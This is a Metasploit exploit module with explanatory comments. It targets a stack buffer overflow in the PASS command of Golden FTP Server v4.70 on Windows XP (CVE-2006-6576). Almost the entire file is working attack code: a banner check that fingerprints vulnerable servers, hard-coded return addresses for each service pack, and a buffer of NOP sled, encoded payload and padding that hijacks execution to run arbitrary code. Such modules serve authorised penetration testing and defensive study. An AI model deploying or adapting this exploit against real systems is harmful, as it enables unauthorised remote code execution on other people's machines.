##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Average reliability: every target below depends on a hard-coded return
  # address in a specific XP DLL build, so a different patch level fails.
  Rank = AverageRanking

  # Presumably supplies connect/disconnect, banner, raw_send, send_user and
  # send_cmd used below; the mixin itself is not visible in this file.
  include Msf::Exploit::Remote::Ftp

  # Module metadata: name, description, authorship, references, payload
  # constraints and the per-OS return addresses consumed by +exploit+.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'GoldenFTP PASS Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a vulnerability in the Golden FTP service, using the PASS
        command to cause a buffer overflow. Please note that in order trigger the vulnerable
        code, the victim machine must have the "Show new connections" setting enabled. By
        default, this option is unchecked.
      },
      'Author' =>
        [
          'Craig Freyman', # Initial PoC on exploit-db with iglesiasgg
          'bannedit', # Initial msf module
          'Joff Thyer <jsthyer[at]gmail.com>', # Improved msf version
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2006-6576'],
          [ 'OSVDB', '35951'],
          [ 'BID', '45957'],
          [ 'EDB', '16036'],
        ],
      'DefaultOptions' =>
        {
          # Payload exit technique used unless the operator overrides it.
          'EXITFUNC' => 'seh',
        },
      'Privileged' => false,
      'Payload' =>
        {
          # +exploit+ budgets 533 bytes before the return address for the
          # source-address string, a 60-byte sled and the encoded payload;
          # 440 leaves room for both with a dotted-quad source address.
          'Space' => 440,
          # NUL, LF and CR — presumably because they would terminate or
          # split the PASS command line before the whole buffer is read.
          'BadChars' => "\x00\x0a\x0d",
        },
      'Platform' => ['win'],
      'Targets' =>
        [
          # Each 'Ret' is a JMP ESI gadget at a fixed address in the named
          # DLL for that service pack (per the original comments).
          [ 'Windows XP Pro SP3', { 'Ret' => 0x7E45AE4E, } ], # JMP ESI USER32.dll
          [ 'Windows XP Pro SP2', { 'Ret' => 0x77D4E23B, } ], # JMP ESI USER32.dll
          [ 'Windows XP Pro SP0/SP1', { 'Ret' => 0x77e8157b, } ] # JMP ESI kernel32.dll
        ],
      'DisclosureDate' => '2011-01-23'))
  end

  # Version probe: connects, disconnects and inspects the captured banner.
  # Returns Appears only when the banner advertises exactly v4.70; any other
  # version, or no banner at all (nil never matches), yields Safe.
  # The "Show new connections" setting that the description says is required
  # cannot be observed over FTP, so Appears does not guarantee the host is
  # actually exploitable.
  def check
    connect
    disconnect
    # +banner+ is presumably populated by the Ftp mixin during +connect+.
    vprint_status("FTP Banner: #{banner}".strip)
    # +=~+ binds tighter than +and+, so $1 is the captured "4.xx" group of
    # the match on the left-hand side.
    if banner =~ /Golden FTP Server ready v(4\.\d{2})/ and $1 == "4.70"
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Builds the overflow buffer and sends it as the argument of PASS.
  # Buffer layout, in send order:
  #   60-byte NOP sled | encoded payload | NOP padding | target.ret (LE dword)
  # The padding is sized so the bytes before the return address total 533
  # minus the length of this host's source-address string — presumably the
  # server folds the client address into the overflowed field (TODO confirm;
  # the server side is not visible here). A 5-byte short-jump stub is sent as
  # a raw line before USER. No return value; +handler+ establishes any session.
  # From a detection standpoint, a PASS argument several hundred bytes long
  # preceded by a non-command line is unambiguous in FTP logs or a capture.
  def exploit
    # Three NOPs followed by "\xeb\x20" (x86 JMP rel8, +0x20).
    shortjmp = make_nops(3) + "\xeb\x20"
    nopsled = make_nops(1) * 60
    srciplen = Rex::Socket.source_address.length
    # String#* raises ArgumentError if this multiplier goes negative, i.e. if
    # sled + payload + source address ever exceed 533 bytes.
    padding = make_nops(1) * (533 - (srciplen + nopsled.length + payload.encoded.length))

    # NOTE: +<<+ mutates the String that +nopsled+ also references; harmless
    # here because nopsled.length was already consumed above.
    sploit = nopsled
    sploit << payload.encoded
    sploit << padding
    sploit << [target.ret].pack('V') # 32-bit little-endian return address

    print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")

    connect
    # Sent as its own line before any FTP command.
    raw_send(shortjmp + "\n")
    send_user(datastore['FTPUSER'])
    # Second argument false — presumably "do not wait for a reply", since a
    # crashed service sends none (mixin semantics not visible here).
    send_cmd(['PASS', sploit], false)
    # Kernel#select with no descriptors is a plain 2-second sleep, giving the
    # payload time to run before the handler polls.
    select(nil,nil,nil,2)
    handler
    disconnect
  end
end